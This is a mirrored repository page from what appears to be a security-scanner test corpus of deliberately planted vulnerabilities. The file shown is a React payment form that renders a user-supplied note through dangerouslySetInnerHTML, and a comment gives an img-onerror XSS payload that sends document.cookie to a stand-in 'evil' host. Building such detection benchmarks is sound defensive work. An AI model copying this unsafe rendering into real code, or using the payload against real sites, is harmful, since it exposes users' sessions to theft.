mirror of
https://github.com/Sea-Haven-Industries/security-review.git
synced 2026-09-30 12:43:16 +00:00
Adds canary/ (the planted-vuln corpus from the local-only security-review-testbed, answer-revealing comments stripped so it measures real detection) and canary-meta/ (KEY.md ground truth + CANARY_FLOOR=8, kept OUT of canary/ so detectors never read it). One provider-pattern secret (sk_live_) was sanitized to a non-provider hardcoded key so it stays a CWE-798 finding without tripping push protection. Adds a root .security-review-skip so the org-wide sweep and the local pre-push gate skip this repo's intentional vuln/fixture content; the nightly sweep scans canary/ directly as its recall floor. 20 planted vulns (19 crit/high), 2 decoys, 3 traps.
15 lines
441 B
JavaScript
15 lines
441 B
JavaScript
import React from "react";
|
|
|
|
export default function PaymentForm({ note, amount }) {
|
|
// A note of `<img src=x onerror=fetch('//evil/?c='+document.cookie)>` executes in the user's session.
|
|
return (
|
|
<div className="payment-form">
|
|
<h2>Confirm payment of ${amount}</h2>
|
|
<div
|
|
className="vendor-note"
|
|
dangerouslySetInnerHTML={{ __html: note }}
|
|
/>
|
|
<button type="submit">Pay</button>
|
|
</div>
|
|
);
|
|
}
|